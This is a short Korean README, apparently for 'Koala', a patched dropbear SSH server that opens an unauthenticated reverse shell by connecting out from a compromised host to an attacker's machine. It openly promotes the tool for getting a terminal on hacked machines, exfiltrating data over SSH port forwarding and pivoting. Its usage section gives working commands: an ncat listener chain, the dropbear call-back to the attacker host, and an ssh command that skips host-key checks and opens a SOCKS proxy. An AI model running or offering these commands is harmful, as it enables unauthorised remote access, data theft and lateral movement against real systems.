
수정된 dropbear 서버로, 클라이언트 역할을 하며 인증 없이 로그인을 허용합니다.
Koala는 포트에 바인딩하는 대신 원격 클라이언트에 연결하여 리버스 셸을 여는 dropbear SSH 서버의 패치된 버전입니다.
이는 공격당한 머신에서 pty 터미널을 획득하고 SSH 포트 포워딩을 통해 데이터를 안전하게 유출하는 데 유용합니다. 또한 동적 SSH 포트 포워딩 기능을 사용하여 피봇팅을 수행할 수 있습니다.
[사용법]
클라이언트에서 다음 명령을 실행하여 SSH 연결을 수신합니다: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
공격당한 호스트에서 다음을 실행합니다: $ ./dropbear -p client-host:5000
이제 클라이언트에서 포트 9999에 연결하여 셸을 엽니다: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999